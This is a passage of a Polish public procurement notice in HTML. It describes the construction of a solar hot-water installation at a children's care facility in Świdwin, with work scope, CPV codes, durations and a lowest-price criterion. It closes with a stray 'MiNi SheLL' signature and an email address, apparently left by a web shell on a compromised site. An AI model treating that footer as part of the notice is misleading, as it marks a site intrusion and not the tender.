e)	Przed rozpoczęciem prac Wykonawca zobowiązuje się do dostawy  i montażu TABLICY INFORMACYJNEJ o projekcie zgodnie z wzorem stanowiącym załącznik nr 7 SIWZ. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie budowlano-wykonawczym, przedmiarze robót oraz szczegółowej specyfikacji technicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 45.00.00.00-7, 45.33.22.00-5, 45.33.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa instalacji kolektorów słonecznych w Placówce Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie przy ul. Wojska Polskiego 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa instalacji solarnej wspomagającej kotłownię w celu przygotowania ciepłej wody użytkowej dla budynku Placówki Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie

Zamówienie obejmuje następujące rodzaje prac:
a)	Roboty budowlane polegające na: 
-remoncie pomieszczenia kotłowni - węzła cieplnego dla potrzeb instalacji solarnej,
-likwidacja starego pokrycia dachu i zastąpienie go dachówką blaszaną systemową w kolorze ceglastym, 
-wykonaniu na dachu budynku konstrukcji wsporczej dla zespołu kolektorów słonecznych

b)	Roboty instalacyjne sanitarne polegające na:
-montażu baterii kolektorów słonecznych składającej się z 9  paneli oraz pozostałych urządzeń instalacji solarnej i cwu,

c)	Roboty instalacyjne elektryczne w zakresie podłączenia urządzeń elektrycznych na potrzeby instalacji solarnej i instalacji cwu.

d)	Przed rozpoczęciem prac Wykonawca zobowiązuje się do dostawy  i TABLICY INFORMACYJNEJ o projekcie zgodnie z wzorem stanowiącym załącznik nr 7 SIWZ. 

Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie budowlano-wykonawczym, przedmiarze robót oraz szczegółowej specyfikacji technicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 45.00.00.00-7, 45.33.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com